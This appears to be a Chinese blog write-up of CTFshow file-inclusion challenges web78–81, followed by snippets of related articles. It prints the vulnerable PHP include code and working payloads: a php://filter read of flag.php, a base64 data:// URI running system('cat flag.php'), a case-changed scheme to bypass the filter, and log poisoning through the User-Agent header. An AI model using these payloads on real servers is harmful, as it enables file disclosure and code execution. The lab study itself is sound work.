CTFshou wed文件上传

最新推荐文章于 2024-10-04 11:45:30 发布
最新推荐文章于 2024-10-04 11:45:30 发布
阅读量1k 收藏 1
点赞数
文章标签: web web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63676207/article/details/126998938
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录

前言

提示:这里可以添加本文要记录的大概内容:
小知识:
日志文件包含
访问日志文件记录了服务器收到的每一次请求的IP、访问时间、URL、User-Agent,这4项中的前两项的值都是我们无法控制的,我们只能在自己可以控制的字段上做手脚,其中URL字段由于URL编码的存在,空格等一些符号无法包含其中,而User-Agent则不会被进行任何二次处理,我们发什么内容,服务器就将其原封不动的写入日志。

访问日志的位置和文件名在不同的系统上会有所差异

apache一般是/var/log/apache/access.log
nginx的log在/var/log/nginx/access.log和/var/log/nginx/error.log

提示:以下是本篇文章正文内容,下面案例可供参考

78、wed78

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

这题比较像前面代码用伪协议和php://filter读取
?file=php://filter/read=convert.base64-encode/resource=flag.php
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。

79、wed79

 <?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

与上面一样一个姿势过

80、wed80

 <?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

虽然🈲了data但是可以用大写绕过
?file=Data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
但是发现没有太大用抓个包并塞入php <?php system('ls');?>
在这里插入图片述
发现老狗把flag改名字了于是写入得出flag
在这里插入图片描述

81、wed81

 <?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

连:都给禁用了不抓个包你能忍
在这里插入图片描述
当然里面啥也没有不过可以访问一下日志文件
在这里插入图片描述
这个目录不对那就试下一个在这里插入图片描述
有反应证明是这个抓个包并写入php代码发现flag
在这里插入图片描述

总结

我是菜鸡真滴很菜

k5ha
关注
JavaWeb实现文件上传与下载实例详解
09-02
在JavaWeb应用开发中,文件上传与下载是不可或缺的功能,特别是在构建交互性强的Web系统时。本篇文章将详细讲解如何使用JavaWeb实现文件上传与下载的实例。 首先,我们来看文件上传的实现过程。文件上传通常涉及到...
CTFshow刷题日记-WEB-文件包含
Love&Share
09-04 4265
文件包含专题 web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 依旧是代码审计类型 直接伪协议 ?file=php://filter/convert.base64-encode/resource=flag.php ?file=data://text/plain,<?php system("nl flag.php");
ctfshow文件包含
njh18790816639的博客
04-11 1455
web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 要用php伪协议php://filter来构造payload!!! 首先这是一个file关键字的get参数传递,php://是一种协议名称,php://filter/是一种访问本地文件的协议,/read=convert.base64-encode/表示读取的方式是base
ctfshow 文件包含
qq_53755216的博客
05-17 220
说明 从零开始学 主要为了学知识 web78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } php伪协议读取 ?file=php://filter/convert.base64-encode/resource=flag.php php://filter 读取源代码并进行base64编码输出,不然会直接当做php
java数据库连接-javawed
10-31
java后端,用德鲁伊连接数据库
Web文件的上传与下载源码
08-19
Web开发中,文件的上传和下载是两个非常重要的功能,尤其在用户交互频繁的网站或应用程序中。这里,我们主要探讨的是如何实现这些功能的源码层面。 首先,让我们来了解一下文件上传的过程。文件上传通常涉及到...
禁止js文件缓存的代码
10-29
在网页开发中,JavaScript文件的缓存是一种常见的优化策略,它可以提高页面加载速度,但有时也会带来问题,比如当你更新了JS文件而用户仍然在使用旧版本时。为了解决这个问题,我们需要禁止或强制更新JS文件的缓存。...
JavaWeb实现文件上传下载
12-22
课堂讲义: 从运行结果可以看到,我们的文件下载功能已经可以正常下载文件了。  关于JavaWeb中的文件上传和下载功能的内容就这么多。
云计算中过等保三级需要的网络安全设备及详细讲解
weixin_59571541的博客
09-29 783
随着云计算技术的发展,数据的存储和处理逐渐向云端迁移,这在提高工作效率的同时,也带来了许多安全挑战。在中国,《网络安全等级保护条例》将网络安全分为五个等级,其中等级保护三级(等保三级)是针对中等风险环境下的安全要求。要保障云计算环境中的数据安全和业务连续性,必须部署一系列合适的网络安全设备。本文将详细介绍等保三级所需的主要网络安全设备。
【网络安全】Cookie与ID未强绑定导致账户接管
等风来
10-02 164
DigiLocker 是一项在线服务,旨在为公民提供一个安全的数字平台,用于存储和访问重要的文档,如 Aadhaar 卡、PAN 卡和成绩单等。DigiLocker 通过多因素身份验证(MFA)来保护用户账户安全,通常包括 6 位数的安全 PIN 和一次性密码(OTP)验证。
网络安全:保护您的数字世界
不迁怒,不贰过。小知识,大智慧。
09-29 1096
在当今数字化时代,网络安全已经成为每个人都应该关注的重要议题。随着互联网的普及和信息技术的快速发展,我们的个人信息、财务数据甚至国家安全都面临着来自网络的威胁。网络攻击日益猖獗,黑客利用漏洞和技术手段,威胁着我们的数字世界的安全。在这个信息爆炸的时代,数据的泄露和被篡改可能带来严重的后果,影响个人隐私、金融安全甚至国家稳定。因此,保护我们的数字世界免受网络攻击变得至关重要。本文将探讨网络安全的重要性,介绍网络安全的基本概念和最佳实践,帮助读者更好地了解如何保护自己在数字世界中的安全。让我们共同努力,建立一个
web安全】——sql注入
wxh的博客
09-27 1361
在mysql5版本以后,为了方便管理,默认定义了information_schema数据库,用来存储数据库元数据信息。schemata(数据库名)、tables(表名tableschema)、columns(列名或字段名)。
从《GTA5》的反外挂斗争看网络安全的重要性
@云安全小杜
09-26 875
本文将探讨《GTA5》在对抗外挂过程中遇到的挑战,特别是当游戏开发者试图增强游戏安全性时所遭受的DDoS攻击,并从中提炼出对于网络安全的一些启示。然而,随着游戏人气的增长,一些不法分子开始利用技术手段制作并销售外挂程序,这些程序可以让使用者在游戏中获得不公平的优势,从而破坏了游戏环境。请注意,以上内容是基于假设的情景编写的技术分析文章,实际案例可能涉及更多的细节和技术层面的问题。《GTA5》与外挂之间的斗争提醒我们,在享受数字世界带来的便利的同时,也需要时刻警惕潜在的安全风险,并积极采取措施加以防范。
【完-网络安全】Windows注册表
Ryoujou的博客
09-29 391
Windows注册表
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
09-29 2121
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
Web安全 - 路径穿越(Path Traversal)
小工匠
10-02 2229
路径穿越(Path Traversal)是一种Web应用漏洞,攻击者通过操控输入文件路径参数,以访问系统上未经授权的文件。通过路径穿越,攻击者可以使用诸如../的相对路径绕过访问限制,读取系统敏感信息或修改配置文件。
Web安全 - 重放攻击(Replay Attack)
小工匠
10-01 1177
重放攻击(Replay Attack)是一种网络攻击方式,攻击者通过截取并重复发送已经捕获的合法通信数据包,企图在受害者不知情的情况下冒充合法用户进行操作。这种攻击常见于不安全的网络协议中,攻击者无需破解通信内容,只需重发合法的消息即可造成安全威胁。重放攻击的潜在危害包括:未授权的交易执行、非法获取资源、数据泄露以及系统篡改等。随着网络系统的日益复杂,重放攻击仍然是一个常见的威胁,尤其是在不具备防御机制的旧协议或自定义通信方案中。使用缓存减少存储开销。利用异步处理避免阻塞主线程。
选择网络安全模式启动Windows系统,解决PC无法连接网络问题
最新发布
dvlinker的技术专栏
10-04 1104
选择网络安全模式启动Windows系统,解决PC无法连接网络问题。
Web安全 - 服务端请求伪造SSRF(Server-Side Request Forgery)
小工匠
09-29 1569
SSRF攻击的本质是利用服务器作为代理,发送请求到攻击者指定的目标(如内部网络资源、外部服务等),从而绕过客户端的防火墙、访问控制或认证机制。例如,代理在处理本地IP请求时,触发安全告警。若代理未能正确过滤和验证请求内容,攻击者可能通过代理访问不受控制的资源,或借助代理规避安全限制。:某些Web应用将对外服务作为身份验证的依赖(例如OAuth),SSRF攻击可以伪造服务器请求,以获取未授权的访问。:对所有代理请求使用安全令牌或密钥验证,并模拟攻击者尝试绕过验证过程,确保代理可以识别并阻止非法请求。
postman请求oss上传文件
05-26
可以通过以下步骤使用 Postman 请求 OSS 上传文件: 1. 在 Postman 中创建一个 POST 请求,并输入 OSS 的上传 API 地址。 2. 在请求的 Headers 中添加以下参数: - Authorization: 用于认证用户身份的 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值